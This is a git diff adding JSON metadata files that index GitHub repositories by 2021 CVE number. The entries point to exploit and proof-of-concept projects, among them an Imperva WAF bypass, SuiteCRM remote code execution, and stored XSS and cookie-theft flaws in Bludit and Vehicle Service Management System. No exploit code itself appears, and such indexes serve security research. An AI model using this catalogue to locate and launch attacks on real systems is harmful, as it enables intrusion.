b/2021/CVE-2021-45468.json new file mode 100644 index 0000000000..61caa3ad4c --- /dev/null +++ b/2021/CVE-2021-45468.json @@ -0,0 +1,33 @@ +[ + { + "id": 437462281, + "name": "Imperva_gzip_bypass", + "full_name": "0xhaggis\/Imperva_gzip_bypass", + "owner": { + "login": "0xhaggis", + "id": 6735009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6735009?v=4", + "html_url": "https:\/\/github.com\/0xhaggis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xhaggis\/Imperva_gzip_bypass", + "description": "Exploit for CVE-2021-45468, an Imperva WAF bypass.", + "fork": false, + "created_at": "2021-12-12T05:36:46Z", + "updated_at": "2024-10-24T15:27:09Z", + "pushed_at": "2021-12-21T21:03:08Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45485.json b/2021/CVE-2021-45485.json new file mode 100644 index 0000000000..bda882dec9 --- /dev/null +++ b/2021/CVE-2021-45485.json @@ -0,0 +1,33 @@ +[ + { + "id": 486493337, + "name": "linux-4.19.72_CVE-2021-45485", + "full_name": "Satheesh575555\/linux-4.19.72_CVE-2021-45485", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.19.72_CVE-2021-45485", + "description": null, + "fork": false, + "created_at": "2022-04-28T07:38:04Z", + "updated_at": "2023-03-08T01:46:06Z", + "pushed_at": "2022-04-28T07:40:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45744.json b/2021/CVE-2021-45744.json new file mode 100644 index 0000000000..c31e397cf3 --- /dev/null +++ b/2021/CVE-2021-45744.json @@ -0,0 +1,64 @@ +[ + { + "id": 439930586, + "name": "Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS", + "full_name": "plsanu\/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS", + "description": "CVE-2021-45744 - A Stored Cross Site Scripting (XSS) vulnerability exists in bludit 3.13.1 via the TAGS section in login panel. Application stores attacker injected dangerous JavaScript in to the database and executes without validating.", + "fork": false, + "created_at": "2021-12-19T17:50:15Z", + "updated_at": "2022-01-14T18:38:05Z", + "pushed_at": "2022-01-14T16:00:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448017630, + "name": "CVE-2021-45744", + "full_name": "plsanu\/CVE-2021-45744", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-45744", + "description": "CVE-2021-45744 - A Stored Cross Site Scripting (XSS) vulnerability exists in bludit 3.13.1 via the TAGS section in login panel. Application stores attacker injected dangerous JavaScript in to the database and executes without validating.", + "fork": false, + "created_at": "2022-01-14T15:36:21Z", + "updated_at": "2023-12-30T08:24:30Z", + "pushed_at": "2022-01-14T16:00:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45745.json b/2021/CVE-2021-45745.json new file mode 100644 index 0000000000..41c08a682e --- /dev/null +++ b/2021/CVE-2021-45745.json @@ -0,0 +1,64 @@ +[ + { + "id": 439931620, + "name": "Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS", + "full_name": "plsanu\/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS", + "description": "CVE-2021-45745 - A Stored Cross Site Scripting (XSS) vulnerability exists in Bludit 3.13.1 via the About Plugin in login panel. Application stores attacker injected dangerous JavaScript in to the database and executes without validating.", + "fork": false, + "created_at": "2021-12-19T17:54:55Z", + "updated_at": "2022-01-14T18:37:28Z", + "pushed_at": "2022-01-14T16:51:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448040948, + "name": "CVE-2021-45745", + "full_name": "plsanu\/CVE-2021-45745", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-45745", + "description": "CVE-2021-45745 - A Stored Cross Site Scripting (XSS) vulnerability exists in Bludit 3.13.1 via the About Plugin in login panel. Application stores attacker injected dangerous JavaScript in to the database and executes without validating.", + "fork": false, + "created_at": "2022-01-14T16:52:08Z", + "updated_at": "2023-12-30T08:24:27Z", + "pushed_at": "2022-01-14T16:52:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45897.json b/2021/CVE-2021-45897.json new file mode 100644 index 0000000000..f9c8e1246d --- /dev/null +++ b/2021/CVE-2021-45897.json @@ -0,0 +1,41 @@ +[ + { + "id": 454128931, + "name": "CVE-2021-45897", + "full_name": "manuelz120\/CVE-2021-45897", + "owner": { + "login": "manuelz120", + "id": 1948316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1948316?v=4", + "html_url": "https:\/\/github.com\/manuelz120", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/manuelz120\/CVE-2021-45897", + "description": "PoC for CVE-2021-45897", + "fork": false, + "created_at": "2022-01-31T18:48:40Z", + "updated_at": "2024-11-20T07:18:11Z", + "pushed_at": "2022-01-31T20:07:45Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "owasp-top-ten", + "python3", + "rce", + "remote-code-execution", + "security", + "suitecrm" + ], + "visibility": "public", + "forks": 7, + "watchers": 18, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45901.json b/2021/CVE-2021-45901.json new file mode 100644 index 0000000000..81de8d2c1f --- /dev/null +++ b/2021/CVE-2021-45901.json @@ -0,0 +1,33 @@ +[ + { + "id": 401943849, + "name": "CVE-2021-45901", + "full_name": "9lyph\/CVE-2021-45901", + "owner": { + "login": "9lyph", + "id": 44860700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44860700?v=4", + "html_url": "https:\/\/github.com\/9lyph", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/9lyph\/CVE-2021-45901", + "description": null, + "fork": false, + "created_at": "2021-09-01T05:35:59Z", + "updated_at": "2024-10-04T01:06:01Z", + "pushed_at": "2024-10-04T01:05:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45960.json b/2021/CVE-2021-45960.json new file mode 100644 index 0000000000..57dd3a3a2f --- /dev/null +++ b/2021/CVE-2021-45960.json @@ -0,0 +1,95 @@ +[ + { + "id": 480355744, + "name": "external_expat_AOSP10_r33_CVE-2021-45960", + "full_name": "nanopathi\/external_expat_AOSP10_r33_CVE-2021-45960", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/external_expat_AOSP10_r33_CVE-2021-45960", + "description": null, + "fork": false, + "created_at": "2022-04-11T11:45:57Z", + "updated_at": "2022-04-11T12:31:47Z", + "pushed_at": "2022-04-11T11:50:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 496156933, + "name": "external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-", + "full_name": "Trinadh465\/external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-", + "description": null, + "fork": false, + "created_at": "2022-05-25T09:03:48Z", + "updated_at": "2023-09-15T18:25:11Z", + "pushed_at": "2022-05-25T09:09:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624286353, + "name": "external_expat_v2.2.6_CVE-2021-45960", + "full_name": "hshivhare67\/external_expat_v2.2.6_CVE-2021-45960", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/external_expat_v2.2.6_CVE-2021-45960", + "description": null, + "fork": false, + "created_at": "2023-04-06T06:20:55Z", + "updated_at": "2023-04-06T06:30:55Z", + "pushed_at": "2023-04-06T06:32:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46005.json b/2021/CVE-2021-46005.json new file mode 100644 index 0000000000..ed53a2066d --- /dev/null +++ b/2021/CVE-2021-46005.json @@ -0,0 +1,33 @@ +[ + { + "id": 452689935, + "name": "CVE-2021-46005", + "full_name": "nawed20002\/CVE-2021-46005", + "owner": { + "login": "nawed20002", + "id": 98532470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98532470?v=4", + "html_url": "https:\/\/github.com\/nawed20002", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nawed20002\/CVE-2021-46005", + "description": "CVE-2021-46005", + "fork": false, + "created_at": "2022-01-27T13:18:16Z", + "updated_at": "2022-01-27T13:50:06Z", + "pushed_at": "2022-02-03T11:01:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46063.json b/2021/CVE-2021-46063.json new file mode 100644 index 0000000000..909c476b6c --- /dev/null +++ b/2021/CVE-2021-46063.json @@ -0,0 +1,95 @@ +[ + { + "id": 786354547, + "name": "CVE-2021-46063-2", + "full_name": "miguelc49\/CVE-2021-46063-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2021-46063-2", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:38:33Z", + "updated_at": "2024-04-14T17:38:55Z", + "pushed_at": "2024-04-16T00:54:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786354560, + "name": "CVE-2021-46063-1", + "full_name": "miguelc49\/CVE-2021-46063-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2021-46063-1", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:38:36Z", + "updated_at": "2024-04-14T17:38:50Z", + "pushed_at": "2024-04-16T00:54:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786354582, + "name": "CVE-2021-46063-3", + "full_name": "miguelc49\/CVE-2021-46063-3", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2021-46063-3", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:38:42Z", + "updated_at": "2024-04-14T17:38:58Z", + "pushed_at": "2024-04-16T00:54:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46067.json b/2021/CVE-2021-46067.json new file mode 100644 index 0000000000..b88ce3154a --- /dev/null +++ b/2021/CVE-2021-46067.json @@ -0,0 +1,64 @@ +[ + { + "id": 442275205, + "name": "Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover", + "full_name": "plsanu\/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover", + "description": "CVE-2021-46067 - In Vehicle Service Management System 1.0 an attacker can steal the cookies leading to Full Account Takeover.", + "fork": false, + "created_at": "2021-12-27T21:15:41Z", + "updated_at": "2022-01-14T18:34:58Z", + "pushed_at": "2022-01-15T11:30:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448049310, + "name": "CVE-2021-46067", + "full_name": "plsanu\/CVE-2021-46067", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46067", + "description": "CVE-2021-46067 - In Vehicle Service Management System 1.0 an attacker can steal the cookies leading to Full Account Takeover.", + "fork": false, + "created_at": "2022-01-14T17:19:09Z", + "updated_at": "2023-12-30T08:23:32Z", + "pushed_at": "2022-01-15T11:31:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46068.json b/2021/CVE-2021-46068.json new file mode 100644 index 0000000000..282c8aa185 --- /dev/null +++ b/2021/CVE-2021-46068.json @@ -0,0 +1,64 @@ +[ + { + "id": 442284128, + "name": "Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS", + "full_name": "plsanu\/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS", + "description": "CVE-2021-46068 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.", + "fork": false, + "created_at": "2021-12-27T22:07:08Z", + "updated_at": "2022-01-14T18:36:14Z", + "pushed_at": "2022-01-14T19:33:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448062357, + "name": "CVE-2021-46068", + "full_name": "plsanu\/CVE-2021-46068", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46068", + "description": "CVE-2021-46068 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel.", + "fork": false, + "created_at": "2022-01-14T18:04:01Z", + "updated_at": "2023-12-30T08:24:13Z", + "pushed_at": "2022-01-14T19:34:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46069.json b/2021/CVE-2021-46069.json new file mode 100644 index 0000000000..0f358f149a --- /dev/null +++ b/2021/CVE-2021-46069.json @@ -0,0 +1,64 @@ +[ + { + "id": 442477283, + "name": "Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS", + "full_name": "plsanu\/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS", + "description": "CVE-2021-46069 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.", + "fork": false, + "created_at": "2021-12-28T13:47:59Z", + "updated_at": "2022-01-14T18:32:37Z", + "pushed_at": "2022-01-14T18:27:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448068658, + "name": "CVE-2021-46069", + "full_name": "plsanu\/CVE-2021-46069", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46069", + "description": "CVE-2021-46069 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.", + "fork": false, + "created_at": "2022-01-14T18:27:00Z", + "updated_at": "2023-12-30T08:24:23Z", + "pushed_at": "2022-01-14T18:27:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46070.json b/2021/CVE-2021-46070.json new file mode 100644 index 0000000000..56e86c6e89 --- /dev/null +++ b/2021/CVE-2021-46070.json @@ -0,0 +1,64 @@ +[ + { + "id": 442480867, + "name": "Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS", + "full_name": "plsanu\/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS", + "description": "CVE-2021-46070 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service Requests Section in login panel.", + "fork": false, + "created_at": "2021-12-28T14:00:52Z", + "updated_at": "2022-01-14T18:53:00Z", + "pushed_at": "2022-01-14T19:33:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448075803, + "name": "CVE-2021-46070", + "full_name": "plsanu\/CVE-2021-46070", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46070", + "description": "CVE-2021-46070 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service Requests Section in login panel.", + "fork": false, + "created_at": "2022-01-14T18:54:29Z", + "updated_at": "2023-12-30T08:24:16Z", + "pushed_at": "2022-01-14T19:32:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46071.json b/2021/CVE-2021-46071.json new file mode 100644 index 0000000000..52500ad8ad --- /dev/null +++ b/2021/CVE-2021-46071.json @@ -0,0 +1,64 @@ +[ + { + "id": 442483260, + "name": "Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS", + "full_name": "plsanu\/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS", + "description": "CVE-2021-46071 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel.", + "fork": false, + "created_at": "2021-12-28T14:09:54Z", + "updated_at": "2022-01-14T19:06:22Z", + "pushed_at": "2022-01-14T19:09:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448079716, + "name": "CVE-2021-46071", + "full_name": "plsanu\/CVE-2021-46071", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46071", + "description": "CVE-2021-46071 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel.", + "fork": false, + "created_at": "2022-01-14T19:09:36Z", + "updated_at": "2023-12-30T08:24:20Z", + "pushed_at": "2022-01-14T19:10:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46072.json b/2021/CVE-2021-46072.json new file mode 100644 index 0000000000..77a747d520 --- /dev/null +++ b/2021/CVE-2021-46072.json @@ -0,0 +1,64 @@ +[ + { + "id": 442486693, + "name": "Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS", + "full_name": "plsanu\/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS", + "description": "CVE-2021-46072 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.", + "fork": false, + "created_at": "2021-12-28T14:22:43Z", + "updated_at": "2022-01-30T06:06:55Z", + "pushed_at": "2022-01-14T19:29:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448085974, + "name": "CVE-2021-46072", + "full_name": "plsanu\/CVE-2021-46072", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46072", + "description": "CVE-2021-46072 - A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel.", + "fork": false, + "created_at": "2022-01-14T19:34:50Z", + "updated_at": "2023-12-30T08:24:11Z", + "pushed_at": "2022-01-14T19:35:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-46073.json b/2021/CVE-2021-46073.json new file mode 100644 index 0000000000..0d67cfcc79 --- /dev/null +++ b/2021/CVE-2021-46073.json @@ -0,0 +1,64 @@ +[ + { + "id": 442488607, + "name": "Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS", + "full_name": "plsanu\/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS", + "owner": { + "login": "plsanu", + "id": 61007700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4", + "html_url": "https:\/\/github.com\/plsanu", + "user_view_type": "public" + }, + "html_url": 